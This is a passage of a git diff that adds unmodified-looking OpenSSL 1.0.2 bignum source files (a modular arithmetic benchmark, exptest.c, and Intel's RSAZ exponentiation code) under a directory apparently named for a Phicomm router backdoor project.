+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1000.0;
+        return ((ret < 0.001) ? 0.001 : ret);
+    }
+#endif
+}
+
+#define NUM_SIZES       7
+#if NUM_START > NUM_SIZES
+# error "NUM_START > NUM_SIZES"
+#endif
+static int sizes[NUM_SIZES] = { 128, 256, 512, 1024, 2048, 4096, 8192 };
+
+static int mul_c[NUM_SIZES] =
+    { 8 * 8 * 8 * 8 * 8 * 8, 8 * 8 * 8 * 8 * 8, 8 * 8 * 8 * 8, 8 * 8 * 8,
+    8 * 8, 8, 1
+};
+
+/*
+ * static int sizes[NUM_SIZES]={59,179,299,419,539};
+ */
+
+#define RAND_SEED(string) { const char str[] = string; RAND_seed(string, sizeof str); }
+
+void do_mul_exp(BIGNUM *r, BIGNUM *a, BIGNUM *b, BIGNUM *c, BN_CTX *ctx);
+
+int main(int argc, char **argv)
+{
+    BN_CTX *ctx;
+    BIGNUM *a, *b, *c, *r;
+
+#if 1
+    if (!CRYPTO_set_mem_debug_functions(0, 0, 0, 0, 0))
+        abort();
+#endif
+
+    ctx = BN_CTX_new();
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+    r = BN_new();
+
+    while (!RAND_status())
+        /* not enough bits */
+        RAND_SEED("I demand a manual recount!");
+
+    do_mul_exp(r, a, b, c, ctx);
+    return 0;
+}
+
+void do_mul_exp(BIGNUM *r, BIGNUM *a, BIGNUM *b, BIGNUM *c, BN_CTX *ctx)
+{
+    int i, k;
+    double tm;
+    long num;
+
+    num = BASENUM;
+    for (i = NUM_START; i < NUM_SIZES; i++) {
+#ifdef C_PRIME
+# ifdef TEST_SQRT
+        if (!BN_set_word(a, 64))
+            goto err;
+        if (!BN_set_word(b, P_MOD_64))
+            goto err;
+#  define ADD a
+#  define REM b
+# else
+#  define ADD NULL
+#  define REM NULL
+# endif
+        if (!BN_generate_prime(c, sizes[i], 0, ADD, REM, genprime_cb, NULL))
+            goto err;
+        putc('\n', stderr);
+        fflush(stderr);
+#endif
+
+        for (k = 0; k < num; k++) {
+            if (k % 50 == 0) {  /* Average over num/50 different choices of
+                                 * random numbers. */
+                if (!BN_pseudo_rand(a, sizes[i], 1, 0))
+                    goto err;
+
+                if (!BN_pseudo_rand(b, sizes[i], 1, 0))
+                    goto err;
+
+#ifndef C_PRIME
+                if (!BN_pseudo_rand(c, sizes[i], 1, 1))
+                    goto err;
+#endif
+
+#ifdef TEST_SQRT
+                if (!BN_mod_sqr(a, a, c, ctx))
+                    goto err;
+                if (!BN_mod_sqr(b, b, c, ctx))
+                    goto err;
+#else
+                if (!BN_nnmod(a, a, c, ctx))
+                    goto err;
+                if (!BN_nnmod(b, b, c, ctx))
+                    goto err;
+#endif
+
+                if (k == 0)
+                    Time_F(START);
+            }
+#if defined(TEST_EXP)
+            if (!BN_mod_exp(r, a, b, c, ctx))
+                goto err;
+#elif defined(TEST_MUL)
+            {
+                int i = 0;
+                for (i = 0; i < 50; i++)
+                    if (!BN_mod_mul(r, a, b, c, ctx))
+                        goto err;
+            }
+#elif defined(TEST_SQR)
+            {
+                int i = 0;
+                for (i = 0; i < 50; i++) {
+                    if (!BN_mod_sqr(r, a, c, ctx))
+                        goto err;
+                    if (!BN_mod_sqr(r, b, c, ctx))
+                        goto err;
+                }
+            }
+#elif defined(TEST_GCD)
+            if (!BN_gcd(r, a, b, ctx))
+                goto err;
+            if (!BN_gcd(r, b, c, ctx))
+                goto err;
+            if (!BN_gcd(r, c, a, ctx))
+                goto err;
+#elif defined(TEST_KRON)
+            if (-2 == BN_kronecker(a, b, ctx))
+                goto err;
+            if (-2 == BN_kronecker(b, c, ctx))
+                goto err;
+            if (-2 == BN_kronecker(c, a, ctx))
+                goto err;
+#elif defined(TEST_INV)
+            if (!BN_mod_inverse(r, a, c, ctx))
+                goto err;
+            if (!BN_mod_inverse(r, b, c, ctx))
+                goto err;
+#else                           /* TEST_SQRT */
+            if (!BN_mod_sqrt(r, a, c, ctx))
+                goto err;
+            if (!BN_mod_sqrt(r, b, c, ctx))
+                goto err;
+#endif
+        }
+        tm = Time_F(STOP);
+        printf(
+#if defined(TEST_EXP)
+                  "modexp %4d ^ %4d %% %4d"
+#elif defined(TEST_MUL)
+                  "50*modmul %4d %4d %4d"
+#elif defined(TEST_SQR)
+                  "100*modsqr %4d %4d %4d"
+#elif defined(TEST_GCD)
+                  "3*gcd %4d %4d %4d"
+#elif defined(TEST_KRON)
+                  "3*kronecker %4d %4d %4d"
+#elif defined(TEST_INV)
+                  "2*inv %4d %4d mod %4d"
+#else                           /* TEST_SQRT */
+                  "2*sqrt [prime == %d (mod 64)] %4d %4d mod %4d"
+#endif
+                  " -> %8.6fms %5.1f (%ld)\n",
+#ifdef TEST_SQRT
+                  P_MOD_64,
+#endif
+                  sizes[i], sizes[i], sizes[i], tm * 1000.0 / num,
+                  tm * mul_c[i] / num, num);
+        num /= 7;
+        if (num <= 0)
+            num = 1;
+    }
+    return;
+
+ err:
+    ERR_print_errors_fp(stderr);
+}
+
+#ifdef C_PRIME
+static void genprime_cb(int p, int n, void *arg)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    putc(c, stderr);
+    fflush(stderr);
+    (void)n;
+    (void)arg;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exptest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exptest.c
new file mode 100644
index 0000000..8b3a4ba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exptest.c
@@ -0,0 +1,249 @@
+/* crypto/bn/exptest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#include <openssl/bio.h>
+#include <openssl/bn.h>
+#include <openssl/rand.h>
+#include <openssl/err.h>
+
+#define NUM_BITS        (BN_BITS*2)
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+/*
+ * test_exp_mod_zero tests that x**0 mod 1 == 0. It returns zero on success.
+ */
+static int test_exp_mod_zero()
+{
+    BIGNUM a, p, m;
+    BIGNUM r;
+    BN_CTX *ctx = BN_CTX_new();
+    int ret = 1;
+
+    BN_init(&m);
+    BN_one(&m);
+
+    BN_init(&a);
+    BN_one(&a);
+
+    BN_init(&p);
+    BN_zero(&p);
+
+    BN_init(&r);
+    BN_mod_exp(&r, &a, &p, &m, ctx);
+    BN_CTX_free(ctx);
+
+    if (BN_is_zero(&r))
+        ret = 0;
+    else {
+        printf("1**0 mod 1 = ");
+        BN_print_fp(stdout, &r);
+        printf(", should be 0\n");
+    }
+
+    BN_free(&r);
+    BN_free(&a);
+    BN_free(&p);
+    BN_free(&m);
+
+    return ret;
+}
+
+int main(int argc, char *argv[])
+{
+    BN_CTX *ctx;
+    BIO *out = NULL;
+    int i, ret;
+    unsigned char c;
+    BIGNUM *r_mont, *r_mont_const, *r_recp, *r_simple, *a, *b, *m;
+
+    RAND_seed(rnd_seed, sizeof rnd_seed); /* or BN_rand may fail, and we
+                                           * don't even check its return
+                                           * value (which we should) */
+
+    ERR_load_BN_strings();
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        EXIT(1);
+    r_mont = BN_new();
+    r_mont_const = BN_new();
+    r_recp = BN_new();
+    r_simple = BN_new();
+    a = BN_new();
+    b = BN_new();
+    m = BN_new();
+    if ((r_mont == NULL) || (r_recp == NULL) || (a == NULL) || (b == NULL))
+        goto err;
+
+    out = BIO_new(BIO_s_file());
+
+    if (out == NULL)
+        EXIT(1);
+    BIO_set_fp(out, stdout, BIO_NOCLOSE);
+
+    for (i = 0; i < 200; i++) {
+        RAND_bytes(&c, 1);
+        c = (c % BN_BITS) - BN_BITS2;
+        BN_rand(a, NUM_BITS + c, 0, 0);
+
+        RAND_bytes(&c, 1);
+        c = (c % BN_BITS) - BN_BITS2;
+        BN_rand(b, NUM_BITS + c, 0, 0);
+
+        RAND_bytes(&c, 1);
+        c = (c % BN_BITS) - BN_BITS2;
+        BN_rand(m, NUM_BITS + c, 0, 1);
+
+        BN_mod(a, a, m, ctx);
+        BN_mod(b, b, m, ctx);
+
+        ret = BN_mod_exp_mont(r_mont, a, b, m, ctx, NULL);
+        if (ret <= 0) {
+            printf("BN_mod_exp_mont() problems\n");
+            ERR_print_errors(out);
+            EXIT(1);
+        }
+
+        ret = BN_mod_exp_recp(r_recp, a, b, m, ctx);
+        if (ret <= 0) {
+            printf("BN_mod_exp_recp() problems\n");
+            ERR_print_errors(out);
+            EXIT(1);
+        }
+
+        ret = BN_mod_exp_simple(r_simple, a, b, m, ctx);
+        if (ret <= 0) {
+            printf("BN_mod_exp_simple() problems\n");
+            ERR_print_errors(out);
+            EXIT(1);
+        }
+
+        ret = BN_mod_exp_mont_consttime(r_mont_const, a, b, m, ctx, NULL);
+        if (ret <= 0) {
+            printf("BN_mod_exp_mont_consttime() problems\n");
+            ERR_print_errors(out);
+            EXIT(1);
+        }
+
+        if (BN_cmp(r_simple, r_mont) == 0
+            && BN_cmp(r_simple, r_recp) == 0
+            && BN_cmp(r_simple, r_mont_const) == 0) {
+            printf(".");
+            fflush(stdout);
+        } else {
+            if (BN_cmp(r_simple, r_mont) != 0)
+                printf("\nsimple and mont results differ\n");
+            if (BN_cmp(r_simple, r_mont_const) != 0)
+                printf("\nsimple and mont const time results differ\n");
+            if (BN_cmp(r_simple, r_recp) != 0)
+                printf("\nsimple and recp results differ\n");
+
+            printf("a (%3d) = ", BN_num_bits(a));
+            BN_print(out, a);
+            printf("\nb (%3d) = ", BN_num_bits(b));
+            BN_print(out, b);
+            printf("\nm (%3d) = ", BN_num_bits(m));
+            BN_print(out, m);
+            printf("\nsimple   =");
+            BN_print(out, r_simple);
+            printf("\nrecp     =");
+            BN_print(out, r_recp);
+            printf("\nmont     =");
+            BN_print(out, r_mont);
+            printf("\nmont_ct  =");
+            BN_print(out, r_mont_const);
+            printf("\n");
+            EXIT(1);
+        }
+    }
+    BN_free(r_mont);
+    BN_free(r_mont_const);
+    BN_free(r_recp);
+    BN_free(r_simple);
+    BN_free(a);
+    BN_free(b);
+    BN_free(m);
+    BN_CTX_free(ctx);
+    ERR_remove_thread_state(NULL);
+    CRYPTO_mem_leaks(out);
+    BIO_free(out);
+    printf("\n");
+
+    if (test_exp_mod_zero() != 0)
+        goto err;
+
+    printf("done\n");
+
+    EXIT(0);
+ err:
+    ERR_load_crypto_strings();
+    ERR_print_errors(out);
+#ifdef OPENSSL_SYS_NETWARE
+    printf("ERROR\n");
+#endif
+    EXIT(1);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.c
new file mode 100644
index 0000000..a486b15
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.c
@@ -0,0 +1,336 @@
+/*****************************************************************************
+*                                                                            *
+*  Copyright (c) 2012, Intel Corporation                                     *
+*                                                                            *
+*  All rights reserved.                                                      *
+*                                                                            *
+*  Redistribution and use in source and binary forms, with or without        *
+*  modification, are permitted provided that the following conditions are    *
+*  met:                                                                      *
+*                                                                            *
+*  *  Redistributions of source code must retain the above copyright         *
+*     notice, this list of conditions and the following disclaimer.          *
+*                                                                            *
+*  *  Redistributions in binary form must reproduce the above copyright      *
+*     notice, this list of conditions and the following disclaimer in the    *
+*     documentation and/or other materials provided with the                 *
+*     distribution.                                                          *
+*                                                                            *
+*  *  Neither the name of the Intel Corporation nor the names of its         *
+*     contributors may be used to endorse or promote products derived from   *
+*     this software without specific prior written permission.               *
+*                                                                            *
+*                                                                            *
+*  THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION ""AS IS"" AND ANY          *
+*  EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE         *
+*  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR        *
+*  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION OR            *
+*  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,     *
+*  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,       *
+*  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR        *
+*  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF    *
+*  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING      *
+*  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS        *
+*  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.              *
+*                                                                            *
+******************************************************************************
+* Developers and authors:                                                    *
+* Shay Gueron (1, 2), and Vlad Krasnov (1)                                   *
+* (1) Intel Corporation, Israel Development Center, Haifa, Israel            *
+* (2) University of Haifa, Israel                                            *
+*****************************************************************************/
+
+#include "rsaz_exp.h"
+
+/*
+ * See crypto/bn/asm/rsaz-avx2.pl for further details.
+ */
+void rsaz_1024_norm2red_avx2(void *red, const void *norm);
+void rsaz_1024_mul_avx2(void *ret, const void *a, const void *b,
+                        const void *n, BN_ULONG k);
+void rsaz_1024_sqr_avx2(void *ret, const void *a, const void *n, BN_ULONG k,
+                        int cnt);
+void rsaz_1024_scatter5_avx2(void *tbl, const void *val, int i);
+void rsaz_1024_gather5_avx2(void *val, const void *tbl, int i);
+void rsaz_1024_red2norm_avx2(void *norm, const void *red);
+
+#if defined(__GNUC__)
+# define ALIGN64        __attribute__((aligned(64)))
+#elif defined(_MSC_VER)
+# define ALIGN64        __declspec(align(64))
+#elif defined(__SUNPRO_C)
+# define ALIGN64
+# pragma align 64(one,two80)
+#else
+/* not fatal, might hurt performance a little */
+# define ALIGN64
+#endif
+
+ALIGN64 static const BN_ULONG one[40] = {
+    1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+};
+
+ALIGN64 static const BN_ULONG two80[40] = {
+    0, 0, 1 << 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+};
+
+void RSAZ_1024_mod_exp_avx2(BN_ULONG result_norm[16],
+                            const BN_ULONG base_norm[16],
+                            const BN_ULONG exponent[16],
+                            const BN_ULONG m_norm[16], const BN_ULONG RR[16],
+                            BN_ULONG k0)
+{
+    unsigned char storage[320 * 3 + 32 * 9 * 16 + 64]; /* 5.5KB */
+    unsigned char *p_str = storage + (64 - ((size_t)storage % 64));
+    unsigned char *a_inv, *m, *result;
+    unsigned char *table_s = p_str + 320 * 3;
+    unsigned char *R2 = table_s; /* borrow */
+    int index;
+    int wvalue;
+
+    if ((((size_t)p_str & 4095) + 320) >> 12) {
+        result = p_str;
+        a_inv = p_str + 320;
+        m = p_str + 320 * 2;    /* should not cross page */
+    } else {
+        m = p_str;              /* should not cross page */
+        result = p_str + 320;
+        a_inv = p_str + 320 * 2;
+    }
+
+    rsaz_1024_norm2red_avx2(m, m_norm);
+    rsaz_1024_norm2red_avx2(a_inv, base_norm);
+    rsaz_1024_norm2red_avx2(R2, RR);
+
+    rsaz_1024_mul_avx2(R2, R2, R2, m, k0);
+    rsaz_1024_mul_avx2(R2, R2, two80, m, k0);
+
+    /* table[0] = 1 */
+    rsaz_1024_mul_avx2(result, R2, one, m, k0);
+    /* table[1] = a_inv^1 */
+    rsaz_1024_mul_avx2(a_inv, a_inv, R2, m, k0);
+
+    rsaz_1024_scatter5_avx2(table_s, result, 0);
+    rsaz_1024_scatter5_avx2(table_s, a_inv, 1);
+
+    /* table[2] = a_inv^2 */
+    rsaz_1024_sqr_avx2(result, a_inv, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 2);
+#if 0
+    /* this is almost 2x smaller and less than 1% slower */
+    for (index = 3; index < 32; index++) {
+        rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+        rsaz_1024_scatter5_avx2(table_s, result, index);
+    }
+#else
+    /* table[4] = a_inv^4 */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 4);
+    /* table[8] = a_inv^8 */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 8);
+    /* table[16] = a_inv^16 */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 16);
+    /* table[17] = a_inv^17 */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 17);
+
+    /* table[3] */
+    rsaz_1024_gather5_avx2(result, table_s, 2);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 3);
+    /* table[6] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 6);
+    /* table[12] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 12);
+    /* table[24] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 24);
+    /* table[25] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 25);
+
+    /* table[5] */
+    rsaz_1024_gather5_avx2(result, table_s, 4);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 5);
+    /* table[10] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 10);
+    /* table[20] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 20);
+    /* table[21] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 21);
+
+    /* table[7] */
+    rsaz_1024_gather5_avx2(result, table_s, 6);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 7);
+    /* table[14] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 14);
+    /* table[28] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 28);
+    /* table[29] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 29);
+
+    /* table[9] */
+    rsaz_1024_gather5_avx2(result, table_s, 8);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 9);
+    /* table[18] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 18);
+    /* table[19] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 19);
+
+    /* table[11] */
+    rsaz_1024_gather5_avx2(result, table_s, 10);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 11);
+    /* table[22] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 22);
+    /* table[23] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 23);
+
+    /* table[13] */
+    rsaz_1024_gather5_avx2(result, table_s, 12);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 13);
+    /* table[26] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 26);
+    /* table[27] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 27);
+
+    /* table[15] */
+    rsaz_1024_gather5_avx2(result, table_s, 14);
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 15);
+    /* table[30] */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 1);
+    rsaz_1024_scatter5_avx2(table_s, result, 30);
+    /* table[31] */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    rsaz_1024_scatter5_avx2(table_s, result, 31);
+#endif
+
+    /* load first window */
+    p_str = (unsigned char *)exponent;
+    wvalue = p_str[127] >> 3;
+    rsaz_1024_gather5_avx2(result, table_s, wvalue);
+
+    index = 1014;
+
+    while (index > -1) {        /* loop for the remaining 127 windows */
+
+        rsaz_1024_sqr_avx2(result, result, m, k0, 5);
+
+        wvalue = *((unsigned short *)&p_str[index / 8]);
+        wvalue = (wvalue >> (index % 8)) & 31;
+        index -= 5;
+
+        rsaz_1024_gather5_avx2(a_inv, table_s, wvalue); /* borrow a_inv */
+        rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+    }
+
+    /* square four times */
+    rsaz_1024_sqr_avx2(result, result, m, k0, 4);
+
+    wvalue = p_str[0] & 15;
+
+    rsaz_1024_gather5_avx2(a_inv, table_s, wvalue); /* borrow a_inv */
+    rsaz_1024_mul_avx2(result, result, a_inv, m, k0);
+
+    /* from Montgomery */
+    rsaz_1024_mul_avx2(result, result, one, m, k0);
+
+    rsaz_1024_red2norm_avx2(result_norm, result);
+
+    OPENSSL_cleanse(storage, sizeof(storage));
+}
+
+/*
+ * See crypto/bn/rsaz-x86_64.pl for further details.
+ */
+void rsaz_512_mul(void *ret, const void *a, const void *b, const void *n,
+                  BN_ULONG k);
+void rsaz_512_mul_scatter4(void *ret, const void *a, const void *n,
+                           BN_ULONG k, const void *tbl, unsigned int power);
+void rsaz_512_mul_gather4(void *ret, const void *a, const void *tbl,
+                          const void *n, BN_ULONG k, unsigned int power);
+void rsaz_512_mul_by_one(void *ret, const void *a, const void *n, BN_ULONG k);
+void rsaz_512_sqr(void *ret, const void *a, const void *n, BN_ULONG k,
+                  int cnt);
+void rsaz_512_scatter4(void *tbl, const BN_ULONG *val, int power);
+void rsaz_512_gather4(BN_ULONG *val, const void *tbl, int power);
+
+void RSAZ_512_mod_exp(BN_ULONG result[8],
+                      const BN_ULONG base[8], const BN_ULONG exponent[8],
+                      const BN_ULONG m[8], BN_ULONG k0, const BN_ULONG RR[8])
+{
+    unsigned char storage[16 * 8 * 8 + 64 * 2 + 64]; /* 1.2KB */
+    unsigned char *table = storage + (64 - ((size_t)storage % 64));
+    BN_ULONG *a_inv = (BN_ULONG *)(table + 16 * 8 * 8);
+    BN_ULONG *temp = (BN_ULONG *)(table + 16 * 8 * 8 + 8 * 8);
+    unsigned char *p_str = (unsigned char *)exponent;
+    int index;
+    unsigned int wvalue;
+
+    /* table[0] = 1_inv */
+    temp[0] = 0 - m[0];
+    temp[1] = ~m[1];
+    temp[2] = ~m[2];
+    temp[3] = ~m[3];
+    temp[4] = ~m[4];
+    temp[5] = ~m[5];
+    temp[6] = ~m[6];
+    temp[7] = ~m[7];
+    rsaz_512_scatter4(table, temp, 0);
+
+    /* table [1] = a_inv^1 */
+    rsaz_512_mul(a_inv, base, RR, m, k0);
+    rsaz_512_scatter4(table, a_inv, 1);
+
+    /* table [2] = a_inv^2 */
+    rsaz_512_sqr(temp, a_inv, m, k0, 1);
+    rsaz_512_scatter4(table, temp, 2);
+
+    for (index = 3; index < 16; index++)
+        rsaz_512_mul_scatter4(temp, a_inv, m, k0, table, index);
+
+    /* load first window */
+    wvalue = p_str[63];
+
+    rsaz_512_gather4(temp, table, wvalue >> 4);
+    rsaz_512_sqr(temp, temp, m, k0, 4);
+    rsaz_512_mul_gather4(temp, temp, table, m, k0, wvalue & 0xf);
+
+    for (index = 62; index >= 0; index--) {
+        wvalue = p_str[index];
+
+        rsaz_512_sqr(temp, temp, m, k0, 4);
+        rsaz_512_mul_gather4(temp, temp, table, m, k0, wvalue >> 4);
+
+        rsaz_512_sqr(temp, temp, m, k0, 4);
+        rsaz_512_mul_gather4(temp, temp, table, m, k0, wvalue & 0x0f);
+    }
+
+    /* from Montgomery */
+    rsaz_512_mul_by_one(result, temp, m, k0);
+
+    OPENSSL_cleanse(storage, sizeof(storage));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.h
new file mode 100644
index 0000000..bb71fb1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.h
@@ -0,0 +1,47 @@
+/******************************************************************************
+* Copyright(c) 2012, Intel Corp.
+* Developers and authors:
+* Shay Gueron (1, 2), and Vlad Krasnov (1)
+* (1) Intel Corporation, Israel Development Center, Haifa, Israel
+* (2) University of Haifa, Israel
+******************************************************************************
+* LICENSE:
+* This submission to OpenSSL is to be made available under the OpenSSL
+* license, and only to the OpenSSL project, in order to allow integration
+* into the publicly distributed code.
+* The use of this code, or portions of this code, or concepts embedded in
+* this code, or modification of this code and/or algorithm(s) in it, or the
+* use of this code for any other purpose than stated above, requires special
+* licensing.
+******************************************************************************
+* DISCLAIMER:
+* THIS SOFTWARE IS PROVIDED BY THE CONTRIBUTORS AND THE COPYRIGHT OWNERS
+* ``AS IS''. ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
+* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE CONTRIBUTORS OR THE COPYRIGHT
+* OWNERS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
